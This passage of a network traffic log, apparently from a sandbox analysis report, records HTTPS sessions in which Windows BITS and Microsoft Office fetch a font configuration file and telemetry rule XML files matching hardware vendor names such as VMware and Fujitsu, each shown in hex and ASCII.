2024-12-07 09:51:28 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	49767	23.218.208.109	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:28 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-12-07 09:51:29 UTC	535	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y= Cache-Control: public, max-age=215707 Date: Sat, 07 Dec 2024 09:51:29 GMT Content-Length: 55 Connection: close X-CID: 2
2024-12-07 09:51:29 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.6	49769	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:29 UTC	192	OUT	GET /rules/rule120622v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:29 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8CEAC16" x-ms-request-id: fff301c7-601e-0097-4606-48f33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095129Z-r1cf579d778zvkpnhC1EWRv23g00000002600000000037k6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:30 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.6	49771	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:29 UTC	192	OUT	GET /rules/rule120623v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:29 GMT Content-Type: text/xml Content-Length: 464 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97FB6C3C" x-ms-request-id: ad3e0835-e01e-0033-5701-484695000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095129Z-r1cf579d778v97q7hC1EWRf95c00000001qg0000000015zd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:30 UTC	464	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.6	49768	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:29 UTC	192	OUT	GET /rules/rule120621v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:29 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA41997E3" x-ms-request-id: 1f14184f-601e-0050-3802-482c9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095129Z-r1cf579d77867vg8hC1EWR8knc00000001u00000000031hv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:30 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.6	49770	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:29 UTC	192	OUT	GET /rules/rule120620v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:29 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA701121" x-ms-request-id: 3bfd724e-501e-0016-6705-48181b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095129Z-r1cf579d778d5zkmhC1EWRk6h800000002e0000000002srr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:30 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.6	49772	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:29 UTC	192	OUT	GET /rules/rule120624v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:30 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:29 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB7010D66" x-ms-request-id: 229463e4-b01e-0021-2a03-48cab7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095129Z-r1cf579d778zvkpnhC1EWRv23g00000002c00000000006nk x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:30 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.6	49775	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:31 UTC	192	OUT	GET /rules/rule120625v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:32 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT ETag: "0x8DC582B9748630E" x-ms-request-id: c060231a-801e-00ac-2403-48fd65000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095132Z-r1cf579d7782ctslhC1EWRfbrw00000002e00000000032pe x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:32 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.6	49778	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:31 UTC	192	OUT	GET /rules/rule120629v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:32 GMT Content-Type: text/xml Content-Length: 428 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC4F34CA" x-ms-request-id: 7b99b195-101e-0017-7009-4847c7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095132Z-r1cf579d778d5zkmhC1EWRk6h800000002c0000000003km2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:32 UTC	428	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.6	49777	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:31 UTC	192	OUT	GET /rules/rule120628v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:32 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C8E04C8" x-ms-request-id: e9e1dff1-101e-0065-7303-484088000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095132Z-r1cf579d778xq4f9hC1EWRx41g00000001x00000000010vg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:32 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.6	49774	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:31 UTC	192	OUT	GET /rules/rule120626v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:32 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DACDF62" x-ms-request-id: f6d2a488-401e-000a-7403-484a7b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095132Z-r1cf579d7782ctslhC1EWRfbrw00000002m000000000093d x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:32 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.6	49776	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:31 UTC	192	OUT	GET /rules/rule120627v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:32 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:32 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT ETag: "0x8DC582B9E8EE0F3" x-ms-request-id: 987987f9-101e-0034-0e02-4896ff000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095132Z-r1cf579d778dc6d7hC1EWR2vs800000002kg000000003hb6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-07 09:51:32 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
47	192.168.2.6	49782	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-07 09:51:33 UTC	192	OUT	GET /rules/rule120634v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-07 09:51:34 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 07 Dec 2024 09:51:34 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8972972" x-ms-request-id: 48f2d82f-b01e-0084-1302-48d736000000 x-ms-version: 2018-03-28 x-azure-ref: 20241207T095134Z-r1cf579d778z4wflhC1EWRa3h00000000250000000000evm x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
